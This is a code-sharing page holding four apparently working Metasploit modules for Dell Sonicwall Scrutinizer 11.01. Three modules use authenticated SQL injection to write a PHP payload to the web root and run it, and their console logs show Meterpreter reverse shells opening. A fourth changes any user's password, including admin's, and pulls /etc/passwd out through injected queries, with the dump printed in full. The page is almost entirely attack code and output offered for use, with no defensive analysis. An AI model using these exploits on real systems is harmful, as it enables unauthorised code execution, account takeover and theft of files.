Instantly share code, notes, and snippets.

Embed
What would you like to do?
# This module requires Metasploit: http//metasploit.com/download
##
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution",
'Description' => %q{
Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows
an attacker to write arbitrary files to the file system. This vulnerability is used
to write a PHP script to the file system to gain RCE.
This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com
},
'License' => MSF_LICENSE,
'Author' => [],
'References' => [],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['Dell Sonicwall Scrutinizer 11.01', {}],],
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]),
OptString.new('USERNAME', [ false, "The username to authenticate as"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with" ])
], self.class)
end
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),
'vars_get' => {
'name' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD']
}
})
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/
sessionid = $2
cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{$1}"
hexstr = ("<?php " + payload.encoded + " ?>").bytes.map { |b| sprintf("%02x",b) }.join
post = {
'ti' => 1,
'limit' => 25,
'page' => 0,
'order' => '',
'dir' => 'DESC',
'bbp' => 'percent',
'changeUnit' => '',
#should be trivial to support windows, just change the paths
'user_id' => "-9513 OR 9319=9319 LIMIT 0,1 INTO OUTFILE '/home/plixer/scrutinizer/html/d4d/#{sessionid}.php' LINES TERMINATED BY 0x#{hexstr}"
}
register_files_for_cleanup("/home/plixer/scrutinizer/html/d4d/#{sessionid}.php")
send_request_cgi({
'uri' => normalize_uri(target_uri, '/d4d/exporters.php'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})
send_request_cgi({ 'uri' => normalize_uri(target_uri, "/d4d/#{sessionid}.php")})
end
end
__END__
msf exploit(scrutinizer_sqli_exec) > show options
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD passw0rd! no The password to authenticate with
Proxies no Use a proxy chain
RHOST 192.168.1.99 yes The target address
RPORT 80 yes The target port
TARGETURI / yes Base Application path
USERNAME username no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Dell Sonicwall Scrutinizer 11.01
msf exploit(scrutinizer_sqli_exec) > exploit
[*] Started reverse handler on 192.168.1.31:4444
[*] Sending stage (39195 bytes) to 192.168.1.99
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600
meterpreter > shell
Process 3038 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer)
uname -a
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
# This module requires Metasploit: http//metasploit.com/download
##
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution",
'Description' => %q{
Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows
an attacker to write arbitrary files to the file system. This vulnerability is used
to write a PHP script to the file system to gain RCE.
This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com
},
'License' => MSF_LICENSE,
'Author' => [],
'References' => [],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['Dell Sonicwall Scrutinizer 11.01', {}],],
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]),
OptString.new('USERNAME', [ false, "The username to authenticate as"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with" ])
], self.class)
end
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),
'vars_get' => {
'name' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD']
}
})
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/
sessionid = $2
cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{$1}"
hexstr = ("<?php " + payload.encoded + " ?>").bytes.map { |b| sprintf("%02x",b) }.join
post = {
'methodDetail' => "-6045 UNION ALL SELECT NULL,NULL,NULL,0x#{hexstr},NULL,NULL,NULL," +
"NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL " +
"INTO DUMPFILE '/home/plixer/scrutinizer/html/d4d/#{sessionid}.php'#"
}
register_files_for_cleanup("/home/plixer/scrutinizer/html/d4d/#{sessionid}.php")
send_request_cgi({
'uri' => normalize_uri(target_uri, '/d4d/exporters.php'),
'vars_get' => post,
'cookie' => cookie
})
send_request_cgi({ 'uri' => normalize_uri(target_uri, "/d4d/#{sessionid}.php")})
end
end
__END__
msf exploit(scrutinizer_sqli_exec) > show options
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD passw0rd! no The password to authenticate with
Proxies no Use a proxy chain
RHOST 192.168.1.99 yes The target address
RPORT 80 yes The target port
TARGETURI / yes Base Application path
USERNAME username no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Dell Sonicwall Scrutinizer 11.01
msf exploit(scrutinizer_sqli_exec) > exploit
[*] Started reverse handler on 192.168.1.31:4444
[*] Sending stage (39195 bytes) to 192.168.1.99
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600
meterpreter > shell
Process 3038 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer)
uname -a
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
# This module requires Metasploit: http//metasploit.com/download
##
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Dell Sonicwall Scrutinizer Authenticated Arbitrary User Password Change and File Read",
'Description' => %q{
Dell Sonicwall Scrutinizer 11.01 is vulnerable to an arbitrary user password change vuln
and a SQL injection as an admin user during account creation allows for the reading
of arbitrary files.
This module exploits both vulns to go from a user with lesser privileges to changing
the admin user's password, then logging in as admin to exploit the SQLi and read
an arbitrary specified file. Tested on a CentOS box, should work on windows as well.
},
'License' => MSF_LICENSE,
'Author' => [],
'References' => [],
'Targets' => [['Dell Sonicwall Scrutinizer 11.01', {}],],
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', ['false', 'The file to read from the admin sqli', '/etc/passwd']),
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]),
OptString.new('USERNAME', [ false, "The username to authenticate as"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with" ]),
OptInt.new('USERID', [true, "The ID of the user to have their password changed. 'admin' is always 1.", 1])
], self.class)
end
def run
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),
'vars_get' => {
'name' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD']
}
})
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/
sessionid = $2
cookie = "cookiesenabled=1; sessionid=#{sessionid}; userid=#{$1}"
post = {
'tool' => 'userprefs',
'savePrefs' => datastore['USERID'],
'othersTop' => 'true',
'graphType' => 'step',
'hostDisplayType' => 'DNS',
'language' => 'english',
'skin' => 'retro-sonicwall',
'unit' => 'percent',
'tab' => 'tab1',
'defaultMap' => '0',
'flowTopn' => '10',
'statusOption' => 'conversations',
'email' => 'undefined',
'interval' => "1m",
'ibOb' => 'inbound',
'srcDst' => 'src',
'alarmsTopn' => '50',
'statusTopn' => '25',
'statusRefresh' => '5',
'statusViewDeflt' => 'topInterfaces',
'defMailRep' => 'esoTopConversationsCount',
'Timezone' => 'Automatic',
'savePass' => 'passw0rd!',
'useLdap' => '0',
'defFlowalyzRep' => 'availability',
'readonly' => '0'
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/cgi-bin/admin.cgi'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})
if res.code == 500
fail_with("Error updating user's password. Check your credentials")
end
print_good ("Log in with the user's name and the password 'passw0rd!'")
if datastore['USERID'] == 1 && datastore['FILENAME'] != ''
print_good("Attempting to read file using 'admin' account: " + datastore['FILENAME'])
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),
'vars_get' => {
'name' => 'admin',
'pwd' => 'passw0rd!'
}
})
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/
sessionid = $2
cookie = "cookiesenabled=1; sessionid=#{sessionid}; userid=#{$1}"
hexstr = datastore['FILENAME'].bytes.map { |b| sprintf("%02x",b) }.join
i = 0
file = ''
while true
post = {
'tool' => 'userprefs',
'newUser' => 'fdsafdsa',
'pwd' => 'passw0rd!',
'selectedUserGroup' => "2 AND (SELECT 3835 FROM(SELECT COUNT(*),CONCAT(0x716b6b7171,(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{hexstr})) AS CHAR),0x20)),#{(50*i)+1},50)),0x717a7a7571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/cgi-bin/admin.cgi'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})
res.body =~ /qkkqq(.*)qzzuq1/
break if $1 == ''
part = $1.scan(/(..)/).map{|a| a.first.to_i(16).chr}.join
file << part
i+=1
print_good("#{i}. #{part}")
end
print_good(file)
end
end
end
__END__
msf auxiliary(scrutinizer_password_change) > show options
Module options (auxiliary/gather/scrutinizer_password_change):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME /etc/passwd yes The file to read from the admin sqli
PASSWORD passw0rd! no The password to authenticate with
Proxies no Use a proxy chain
RHOST 192.168.1.99 yes The target address
RPORT 80 yes The target port
TARGETURI / yes Base Application path
USERID 1 yes The ID of the user to have their password changed. 'admin' is always 1.
USERNAME username no The username to authenticate as
VHOST no HTTP server virtual host
msf auxiliary(scrutinizer_password_change) > run
[+] Log in with the user's name and the password 'passw0rd!'
[+] Attempting to read file using 'admin' account: /etc/passwd
[+] 1. root:x:0:0:root:/root:/bi
[+] 2. n/bash
bin:x:1:1:bin:/bin
[+] 3. :/sbin/nologin
daemon:x:2
[+] 4. :2:daemon:/sbin:/sbin/nol
[+] 5. ogin
adm:x:3:4:adm:/var/a
[+] 6. dm:/sbin/nologin
lp:x:4:7
[+] 7. :lp:/var/spool/lpd:/sbin/
[+] 8. nologin
sync:x:5:0:sync:/
[+] 9. sbin:/bin/sync
shutdown:x
[+] 10. :6:0:shutdown:/sbin:/sbin
[+] 11. /shutdown
halt:x:7:0:halt
[+] 12. :/sbin:/sbin/halt
mail:x:
[+] 13. 8:12:mail:/var/spool/mail
[+] 14. :/sbin/nologin
uucp:x:10:
[+] 15. 14:uucp:/var/spool/uucp:/
[+] 16. sbin/nologin
operator:x:1
[+] 17. 1:0:operator:/root:/sbin/
[+] 18. nologin
games:x:12:100:ga
[+] 19. mes:/usr/games:/sbin/nolo
[+] 20. gin
gopher:x:13:30:gopher
[+] 21. :/var/gopher:/sbin/nologi
[+] 22. n
ftp:x:14:50:FTP User:/v
[+] 23. ar/ftp:/sbin/nologin
nobo
[+] 24. dy:x:99:99:Nobody:/:/sbin
[+] 25. /nologin
vcsa:x:69:69:vir
[+] 26. tual console memory owner
[+] 27. :/dev:/sbin/nologin
rpc:x
[+] 28. :32:32:Rpcbind Daemon:/va
[+] 29. r/cache/rpcbind:/sbin/nol
[+] 30. ogin
rpcuser:x:29:29:RPC
[+] 31. Service User:/var/lib/nfs
[+] 32. :/sbin/nologin
nfsnobody:
[+] 33. x:65534:65534:Anonymous N
[+] 34. FS User:/var/lib/nfs:/sbi
[+] 35. n/nologin
sshd:x:74:74:Pr
[+] 36. ivilege-separated SSH:/va
[+] 37. r/empty/sshd:/sbin/nologi
[+] 38. n
plixer:x:500:500::/home
[+] 39. /plixer:/bin/bash
ntp:x:3
[+] 40. 8:38::/etc/ntp:/sbin/nolo
[+] 41. gin
dbus:x:81:81:System m
[+] 42. essage bus:/:/sbin/nologi
[+] 43. n
haldaemon:x:68:68:HAL d
[+] 44. aemon:/:/sbin/nologin
apa
[+] 45. che:x:48:48:Apache:/var/w
[+] 46. ww:/sbin/nologin
rtkit:x:
[+] 47. 499:498:RealtimeKit:/proc
[+] 48. :/sbin/nologin
pulse:x:49
[+] 49. 8:497:PulseAudio System D
[+] 50. aemon:/var/run/pulse:/sbi
[+] 51. n/nologin
mysql:x:27:27:M
[+] 52. ySQL Server:/var/lib/mysq
[+] 53. l:/bin/bash
tcpdump:x:72:
[+] 54. 72::/:/sbin/nologin
[+] root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
plixer:x:500:500::/home/plixer:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rtkit:x:499:498:RealtimeKit:/proc:/sbin/nologin
pulse:x:498:497:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
[*] Auxiliary module execution completed
msf auxiliary(scrutinizer_password_change) >
# This module requires Metasploit: http//metasploit.com/download
##
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Dell Sonicwall Scrutinizer 11.01 Authenticated Code Execution",
'Description' => %q{
Dell Sonicwall Scrutinizer 11.01 is vulnerable to an authenticated SQL injection that allows
an attacker to write arbitrary files to the file system. This vulnerability is used
to write a PHP script to the file system to gain RCE.
This was tested on the Dell Scrutinizer appliance available to download on mysonicwall.com
},
'License' => MSF_LICENSE,
'Author' => [],
'References' => [],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['Dell Sonicwall Scrutinizer 11.01', {}],],
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]),
OptString.new('USERNAME', [ false, "The username to authenticate as"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with" ])
], self.class)
end
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),
'vars_get' => {
'name' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD']
}
})
res.body =~ /"userid":"(.*)","sessionid":"(.*)"/
sessionid = $2
cookie = "cookiesenabled=1;sessionid=#{sessionid};userid=#{$1}"
hexstr = ("<?php " + payload.encoded + " ?>").bytes.map { |b| sprintf("%02x",b) }.join
post = {
'xcNetworkDetail' => "-7230 UNION ALL SELECT NULL,0x#{hexstr},NULL,NULL INTO DUMPFILE '/home/plixer/scrutinizer/html/d4d/#{sessionid}.php'#"
}
register_files_for_cleanup("/home/plixer/scrutinizer/html/d4d/#{sessionid}.php")
send_request_cgi({
'uri' => normalize_uri(target_uri, '/d4d/exporters.php'),
'vars_get' => post,
'cookie' => cookie
})
send_request_cgi({ 'uri' => normalize_uri(target_uri, "/d4d/#{sessionid}.php")})
end
end
__END__
msf exploit(scrutinizer_sqli_exec) > show options
Module options (exploit/dell/scrutinizer/scrutinizer_sqli_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD passw0rd! no The password to authenticate with
Proxies no Use a proxy chain
RHOST 192.168.1.99 yes The target address
RPORT 80 yes The target port
TARGETURI / yes Base Application path
USERNAME username no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Dell Sonicwall Scrutinizer 11.01
msf exploit(scrutinizer_sqli_exec) > exploit
[*] Started reverse handler on 192.168.1.31:4444
[*] Sending stage (39195 bytes) to 192.168.1.99
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:38133) at 2014-02-15 09:33:34 -0600
meterpreter > shell
Process 3038 created.
Channel 0 created.
id
uid=48(apache) gid=48(apache) groups=48(apache),500(plixer)
uname -a
Linux fdsafdsafdsa 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment